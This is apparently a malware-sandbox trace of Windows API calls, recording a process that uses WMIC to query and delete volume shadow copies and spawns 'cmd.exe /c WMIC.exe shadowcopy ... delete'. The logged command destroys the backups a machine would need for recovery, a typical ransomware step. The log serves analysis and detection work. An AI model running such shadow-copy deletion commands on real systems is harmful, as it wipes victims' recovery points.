(_Size=0x18) returned 0x52cc60 [0107.181] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0107.181] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0107.181] malloc (_Size=0x18) returned 0x52cc80 [0107.181] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy") returned 0x1e [0107.181] SysStringLen (param_1=" WHERE ") returned 0x7 [0107.181] malloc (_Size=0x18) returned 0x52ccc0 [0107.181] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy WHERE ") returned 0x25 [0107.182] SysStringLen (param_1="ID='{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}'") returned 0x2b [0107.182] free (_Block=0x52cc00) [0107.182] free (_Block=0x52cc80) [0107.182] free (_Block=0x52cc60) [0107.182] free (_Block=0x52cc40) [0107.182] free (_Block=0x52cc20) [0107.182] free (_Block=0x52cba0) [0107.182] ??0CHString@@QEAA@XZ () returned 0x16f8f0 [0107.182] GetCurrentThreadId () returned 0x788 [0107.182] malloc (_Size=0x18) returned 0x52cba0 [0107.182] malloc (_Size=0x18) returned 0x52cc20 [0107.182] malloc (_Size=0x18) returned 0x52cc40 [0107.182] malloc (_Size=0x18) returned 0x52cc60 [0107.182] malloc (_Size=0x18) returned 0x52cc80 [0107.182] SysStringLen (param_1="\\\\") returned 0x2 [0107.182] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0107.183] malloc (_Size=0x18) returned 0x52cc00 [0107.183] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0107.183] SysStringLen (param_1="\\") returned 0x1 [0107.183] malloc (_Size=0x18) returned 0x52cce0 [0107.183] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0107.183] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0107.183] free (_Block=0x52cc00) [0107.183] free (_Block=0x52cc80) [0107.183] free (_Block=0x52cc60) [0107.183] free (_Block=0x52cc40) [0107.183] free (_Block=0x52cc20) [0107.183] free (_Block=0x52cba0) [0107.183] malloc (_Size=0x18) returned 0x52cba0 [0107.183] malloc (_Size=0x18) returned 0x52cc20 [0107.184] malloc (_Size=0x18) returned 0x52cc40 [0107.184] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1f51390, strNetworkResource="\\\\XDUWTFONO\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff2529d0 | out: ppNamespace=0xff2529d0*=0x1f63c18) returned 0x0 [0107.189] free (_Block=0x52cc40) [0107.189] free (_Block=0x52cc20) [0107.189] free (_Block=0x52cba0) [0107.189] CoSetProxyBlanket (pProxy=0x1f63c18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0107.189] free (_Block=0x52cce0) [0107.189] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0107.189] ??0CHString@@QEAA@XZ () returned 0x16f840 [0107.189] GetCurrentThreadId () returned 0x788 [0107.189] malloc (_Size=0x18) returned 0x52cce0 [0107.189] lstrlenA (lpString="") returned 0 [0107.190] malloc (_Size=0x2) returned 0x34dfb0 [0107.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff1e314c, cbMultiByte=-1, lpWideCharStr=0x34dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0107.190] free (_Block=0x34dfb0) [0107.190] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy WHERE ID='{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}'") returned 0x50 [0107.190] SysStringLen (param_1="") returned 0x0 [0107.190] free (_Block=0x52cce0) [0107.190] malloc (_Size=0x18) returned 0x52cce0 [0107.190] IWbemServices:ExecQuery (in: This=0x1f63c18, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_ShadowCopy WHERE ID='{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}'", lFlags=0, pCtx=0x0, ppEnum=0x16f848 | out: ppEnum=0x16f848*=0x1f63d18) returned 0x0 [0107.239] free (_Block=0x52cce0) [0107.239] CoSetProxyBlanket (pProxy=0x1f63d18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0107.242] IEnumWbemClassObject:Next (in: This=0x1f63d18, lTimeout=-1, uCount=0x1, apObjects=0x16f850, puReturned=0x16f860 | out: apObjects=0x16f850*=0x1f63d80, puReturned=0x16f860*=0x1) returned 0x0 [0107.243] malloc (_Size=0x18) returned 0x52cce0 [0107.243] IWbemClassObject:Get (in: This=0x1f63d80, wszName="__PATH", lFlags=0, pVal=0x16f870*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f870*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0107.243] free (_Block=0x52cce0) [0107.243] malloc (_Size=0x800) returned 0x52d080 [0107.243] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x52d080, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0107.243] FormatMessageW (in: dwFlags=0x2500, lpSource=0x52d080, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x16f798, nSize=0x0, Arguments=0x16f7a8 | out: lpBuffer="띐,") returned 0x67 [0107.244] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0107.244] malloc (_Size=0x68) returned 0x52d890 [0107.244] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x52d890, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0107.244] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff252ab0 [0107.244] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0107.244] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0107.244] free (_Block=0x52d890) [0107.244] free (_Block=0x52d080) [0107.244] LocalFree (hMem=0x2cb750) returned 0x0 [0107.244] IWbemServices:DeleteInstance (in: This=0x1f63c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0108.344] IUnknown:Release (This=0x1f63d80) returned 0x0 [0108.344] malloc (_Size=0x800) returned 0x52d080 [0108.344] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x52d080, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0108.344] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0108.344] malloc (_Size=0x20) returned 0x52cef0 [0108.344] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x52cef0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0108.344] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff252ab0 [0108.345] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0108.345] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0108.345] free (_Block=0x52cef0) [0108.345] free (_Block=0x52d080) [0108.345] IEnumWbemClassObject:Next (in: This=0x1f63d18, lTimeout=-1, uCount=0x1, apObjects=0x16f850, puReturned=0x16f860 | out: apObjects=0x16f850*=0x0, puReturned=0x16f860*=0x0) returned 0x1 [0108.346] IUnknown:Release (This=0x1f63d18) returned 0x0 [0108.347] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0108.347] free (_Block=0x52cca0) [0108.347] free (_Block=0x52ccc0) [0108.347] GetCurrentThreadId () returned 0x788 [0108.348] ??0CHString@@QEAA@PEBG@Z () returned 0x16fa28 [0108.348] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x16fa28 [0108.348] lstrlenW (lpString="LIST") returned 4 [0108.348] lstrlenW (lpString="delete") returned 6 [0108.348] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0108.348] lstrlenW (lpString="ASSOC") returned 5 [0108.348] lstrlenW (lpString="delete") returned 6 [0108.348] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0108.348] lstrlenW (lpString="GET") returned 3 [0108.348] lstrlenW (lpString="delete") returned 6 [0108.348] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0108.348] ??1CHString@@QEAA@XZ () returned 0x3b7cec01 [0108.348] WbemLocator:IUnknown:Release (This=0x1f63c18) returned 0x0 [0108.348] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0108.349] _kbhit () returned 0x0 [0108.349] free (_Block=0x526f20) [0108.349] free (_Block=0x52cac0) [0108.349] free (_Block=0x52caa0) [0108.349] free (_Block=0x52ca80) [0108.349] free (_Block=0x52ca60) [0108.349] free (_Block=0x5270a0) [0108.350] free (_Block=0x52cb40) [0108.350] free (_Block=0x5285c0) [0108.350] free (_Block=0x52d020) [0108.350] free (_Block=0x52cbc0) [0108.350] free (_Block=0x52cfa0) [0108.350] free (_Block=0x52cae0) [0108.350] free (_Block=0x52cbe0) [0108.350] free (_Block=0x527140) [0108.350] free (_Block=0x526e00) [0108.350] free (_Block=0x52cff0) [0108.350] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0108.350] free (_Block=0x52ce20) [0108.350] free (_Block=0x52cb00) [0108.350] free (_Block=0x52cb20) [0108.350] free (_Block=0x52cf30) [0108.350] free (_Block=0x52cb60) [0108.350] free (_Block=0x527ee0) [0108.350] free (_Block=0x527f30) [0108.350] free (_Block=0x527f80) [0108.350] free (_Block=0x52cb80) [0108.350] free (_Block=0x526a20) [0108.350] free (_Block=0x526de0) [0108.350] free (_Block=0x528040) [0108.350] free (_Block=0x526dc0) [0108.350] free (_Block=0x528000) [0108.350] free (_Block=0x526d60) [0108.350] free (_Block=0x526d80) [0108.351] free (_Block=0x526c40) [0108.351] free (_Block=0x526c60) [0108.351] free (_Block=0x526be0) [0108.351] free (_Block=0x526c00) [0108.351] free (_Block=0x526ca0) [0108.351] free (_Block=0x526cc0) [0108.351] free (_Block=0x526d00) [0108.351] free (_Block=0x526d20) [0108.351] free (_Block=0x526b20) [0108.351] free (_Block=0x526b40) [0108.351] free (_Block=0x526ac0) [0108.351] free (_Block=0x526ae0) [0108.351] free (_Block=0x526b80) [0108.351] free (_Block=0x526ba0) [0108.351] free (_Block=0x526a60) [0108.351] free (_Block=0x526a80) [0108.351] free (_Block=0x5269d0) [0108.351] free (_Block=0x5269a0) [0108.351] free (_Block=0x526e90) [0108.351] WbemLocator:IUnknown:Release (This=0x1f51390) returned 0x2 [0108.351] WbemLocator:IUnknown:Release (This=0x1f63b28) returned 0x0 [0108.352] WbemLocator:IUnknown:Release (This=0x1f63a98) returned 0x0 [0108.352] WbemLocator:IUnknown:Release (This=0x1f51390) returned 0x1 [0108.352] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0108.352] WbemLocator:IUnknown:Release (This=0x1f51390) returned 0x0 [0108.352] free (_Block=0x52c9e0) [0108.352] free (_Block=0x52ca00) [0108.352] free (_Block=0x528540) [0108.352] free (_Block=0x52ca20) [0108.353] free (_Block=0x52ca40) [0108.353] free (_Block=0x528580) [0108.353] free (_Block=0x52c860) [0108.353] free (_Block=0x52c880) [0108.353] free (_Block=0x5283c0) [0108.353] free (_Block=0x52c8a0) [0108.353] free (_Block=0x52c8c0) [0108.353] free (_Block=0x528400) [0108.353] free (_Block=0x52c7e0) [0108.353] free (_Block=0x52c800) [0108.353] free (_Block=0x528340) [0108.353] free (_Block=0x52c820) [0108.353] free (_Block=0x52c840) [0108.353] free (_Block=0x528380) [0108.353] free (_Block=0x52c960) [0108.353] free (_Block=0x52c980) [0108.353] free (_Block=0x5284c0) [0108.353] free (_Block=0x52c9a0) [0108.353] free (_Block=0x52c9c0) [0108.353] free (_Block=0x528500) [0108.354] free (_Block=0x52c760) [0108.354] free (_Block=0x52c780) [0108.354] free (_Block=0x5282c0) [0108.354] free (_Block=0x52c7a0) [0108.354] free (_Block=0x52c7c0) [0108.354] free (_Block=0x528300) [0108.354] free (_Block=0x52c8e0) [0108.354] free (_Block=0x52c900) [0108.354] free (_Block=0x528440) [0108.354] free (_Block=0x52c920) [0108.354] free (_Block=0x52c940) [0108.354] free (_Block=0x528480) [0108.354] free (_Block=0x52c6a0) [0108.354] free (_Block=0x52c6c0) [0108.354] free (_Block=0x528200) [0108.354] free (_Block=0x52c560) [0108.354] free (_Block=0x52c580) [0108.354] free (_Block=0x5280c0) [0108.354] free (_Block=0x526e50) [0108.355] free (_Block=0x526e70) [0108.355] free (_Block=0x528080) [0108.355] free (_Block=0x52c5e0) [0108.355] free (_Block=0x52c600) [0108.355] free (_Block=0x528140) [0108.355] free (_Block=0x52c6e0) [0108.355] free (_Block=0x52c700) [0108.355] free (_Block=0x528240) [0108.355] free (_Block=0x52c5a0) [0108.355] free (_Block=0x52c5c0) [0108.355] free (_Block=0x528100) [0108.355] free (_Block=0x52c620) [0108.355] free (_Block=0x52c640) [0108.355] free (_Block=0x528180) [0108.355] free (_Block=0x52c660) [0108.355] free (_Block=0x52c680) [0108.355] free (_Block=0x5281c0) [0108.355] free (_Block=0x52c720) [0108.355] free (_Block=0x52c740) [0108.355] free (_Block=0x528280) [0108.356] CoUninitialize () [0108.378] exit (_Code=0) [0108.378] free (_Block=0x52cd30) [0108.378] free (_Block=0x527ea0) [0108.379] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0108.379] free (_Block=0x526f40) [0108.379] free (_Block=0x526a40) [0108.379] free (_Block=0x527e60) [0108.379] free (_Block=0x527e20) [0108.379] free (_Block=0x527dd0) [0108.379] free (_Block=0x527d90) [0108.379] free (_Block=0x527d30) [0108.379] free (_Block=0x525a90) [0108.379] free (_Block=0x525a50) [0108.379] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0108.379] free (_Block=0x52cec0) Thread: id = 195 os_tid = 0x9ac Thread: id = 196 os_tid = 0x9bc Thread: id = 197 os_tid = 0x7d0 Thread: id = 198 os_tid = 0x97c Thread: id = 199 os_tid = 0x6c0 Process: id = "34" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x9812000" os_pid = "0x87c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xaec" cmd_line = "cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}'\" delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 200 os_tid = 0x664 [0108.495] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fcb0 | out: lpSystemTimeAsFileTime=0x18fcb0*(dwLowDateTime=0x4839fb10, dwHighDateTime=0x1d68245)) [0108.495] GetCurrentProcessId () returned 0x87c [0108.495] GetCurrentThreadId () returned 0x664 [0108.495] GetTickCount () returned 0x1150c51 [0108.495] QueryPerformanceCounter (in: lpPerformanceCount=0x18fcb8 | out: lpPerformanceCount=0x18fcb8*=22838864148) returned 1 [0108.501] GetModuleHandleW (lpModuleName=0x0) returned 0x4a7c0000 [0108.501] __set_app_type (_Type=0x1) [0108.501] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a7e7810) returned 0x0 [0108.501] __getmainargs (in: _Argc=0x4a80a608, _Argv=0x4a80a618, _Env=0x4a80a610, _DoWildCard=0, _StartInfo=0x4a7ee0f4 | out: _Argc=0x4a80a608, _Argv=0x4a80a618, _Env=0x4a80a610) returned 0 [0108.502] GetCurrentThreadId () returned 0x664 [0108.502] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x664) returned 0x3c [0108.502] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0108.502] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0108.502] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0108.502] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0108.502] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fc48 | out: phkResult=0x18fc48*=0x0) returned 0x2 [0108.502] VirtualQuery (in: lpAddress=0x18fc30, lpBuffer=0x18fbb0, dwLength=0x30 | out: lpBuffer=0x18fbb0*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.503] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18fbb0, dwLength=0x30 | out: lpBuffer=0x18fbb0*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.503] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18fbb0, dwLength=0x30 | out: lpBuffer=0x18fbb0*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.503] VirtualQuery (in: lpAddress=0x94000, lpBuffer=0x18fbb0, dwLength=0x30 | out: lpBuffer=0x18fbb0*(BaseAddress=0x94000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.503] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18fbb0, dwLength=0x30 | out: lpBuffer=0x18fbb0*(BaseAddress=0x190000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x60000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30 [0108.503] GetConsoleOutputCP () returned 0x1b5 [0108.503] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a7fbfe0 | out: lpCPInfo=0x4a7fbfe0) returned 1 [0108.503] SetConsoleCtrlHandler (HandlerRoutine=0x4a7e3184, Add=1) returned 1 [0108.503] _get_osfhandle (_FileHandle=1) returned 0x7 [0108.503] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0108.504] _get_osfhandle (_FileHandle=1) returned 0x7 [0108.504] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a7ee194 | out: lpMode=0x4a7ee194) returned 1 [0108.504] _get_osfhandle (_FileHandle=1) returned 0x7 [0108.504] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0108.504] _get_osfhandle (_FileHandle=0) returned 0x3 [0108.504] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a7ee198 | out: lpMode=0x4a7ee198) returned 1 [0108.504] _get_osfhandle (_FileHandle=0) returned 0x3 [0108.504] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0108.505] GetEnvironmentStringsW () returned 0x208b90* [0108.505] GetProcessHeap () returned 0x1f0000 [0108.505] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0xa7c) returned 0x209620 [0108.505] FreeEnvironmentStringsW (penv=0x208b90) returned 1 [0108.505] GetProcessHeap () returned 0x1f0000 [0108.505] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x8) returned 0x208a10 [0108.505] GetEnvironmentStringsW () returned 0x208b90* [0108.505] GetProcessHeap () returned 0x1f0000 [0108.505] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0xa7c) returned 0x20a0b0 [0108.505] FreeEnvironmentStringsW (penv=0x208b90) returned 1 [0108.505] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18eb08 | out: phkResult=0x18eb08*=0x44) returned 0x0 [0108.506] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18eb00, lpData=0x18eb20, lpcbData=0x18eb04*=0x1000 | out: lpType=0x18eb00*=0x0, lpData=0x18eb20*=0x18, lpcbData=0x18eb04*=0x1000) returned 0x2 [0108.506] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18eb00, lpData=0x18eb20, lpcbData=0x18eb04*=0x1000 | out: lpType=0x18eb00*=0x4, lpData=0x18eb20*=0x1, lpcbData=0x18eb04*=0x4) returned 0x0 [0108.506] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18eb00, lpData=0x18eb20, lpcbData=0x18eb04*=0x1000 | out: lpType=0x18eb00*=0x0, lpData=0x18eb20*=0x1, lpcbData=0x18eb04*=0x1000) returned 0x2 [0108.506] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18eb00, lpData=0x18eb20, lpcbData=0x18eb04*=0x1000 | out: lpType=0x18eb00*=0x4, lpData=0x18eb20*=0x0, lpcbData=0x18eb04*=0x4) returned 0x0 [0108.506] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18eb00, lpData=0x18eb20, lpcbData=0x18eb04*=0x1000 | out: lpType=0x18eb00*=0x4, lpData=0x18eb20*=0x40, lpcbData=0x18eb04*=0x4) returned 0x0 [0108.506] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18eb00, lpData=0x18eb20, lpcbData=0x18eb04*=0x1000 | out: lpType=0x18eb00*=0x4, lpData=0x18eb20*=0x40, lpcbData=0x18eb04*=0x4) returned 0x0 [0108.506] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18eb00, lpData=0x18eb20, lpcbData=0x18eb04*=0x1000 | out: lpType=0x18eb00*=0x0, lpData=0x18eb20*=0x40, lpcbData=0x18eb04*=0x1000) returned 0x2 [0108.506] RegCloseKey (hKey=0x44) returned 0x0 [0108.506] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18eb08 | out: phkResult=0x18eb08*=0x44) returned 0x0 [0108.506] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18eb00, lpData=0x18eb20, lpcbData=0x18eb04*=0x1000 | out: lpType=0x18eb00*=0x0, lpData=0x18eb20*=0x40, lpcbData=0x18eb04*=0x1000) returned 0x2 [0108.506] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18eb00, lpData=0x18eb20, lpcbData=0x18eb04*=0x1000 | out: lpType=0x18eb00*=0x4, lpData=0x18eb20*=0x1, lpcbData=0x18eb04*=0x4) returned 0x0 [0108.506] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18eb00, lpData=0x18eb20, lpcbData=0x18eb04*=0x1000 | out: lpType=0x18eb00*=0x0, lpData=0x18eb20*=0x1, lpcbData=0x18eb04*=0x1000) returned 0x2 [0108.506] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18eb00, lpData=0x18eb20, lpcbData=0x18eb04*=0x1000 | out: lpType=0x18eb00*=0x4, lpData=0x18eb20*=0x0, lpcbData=0x18eb04*=0x4) returned 0x0 [0108.506] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18eb00, lpData=0x18eb20, lpcbData=0x18eb04*=0x1000 | out: lpType=0x18eb00*=0x4, lpData=0x18eb20*=0x9, lpcbData=0x18eb04*=0x4) returned 0x0 [0108.507] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18eb00, lpData=0x18eb20, lpcbData=0x18eb04*=0x1000 | out: lpType=0x18eb00*=0x4, lpData=0x18eb20*=0x9, lpcbData=0x18eb04*=0x4) returned 0x0 [0108.507] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18eb00, lpData=0x18eb20, lpcbData=0x18eb04*=0x1000 | out: lpType=0x18eb00*=0x0, lpData=0x18eb20*=0x9, lpcbData=0x18eb04*=0x1000) returned 0x2 [0108.507] RegCloseKey (hKey=0x44) returned 0x0 [0108.507] time (in: timer=0x0 | out: timer=0x0) returned 0x5f517451 [0108.507] srand (_Seed=0x5f517451) [0108.507] GetCommandLineW () returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}'\" delete" [0108.507] GetCommandLineW () returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}'\" delete" [0108.507] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a7fc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0108.507] GetProcessHeap () returned 0x1f0000 [0108.507] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x218) returned 0x20ab40 [0108.507] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x20ab50, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0108.508] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a7ef360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0108.508] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a7ef360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0108.508] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a7ef360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0108.508] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0108.508] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0108.508] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0108.508] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0108.508] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0108.508] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 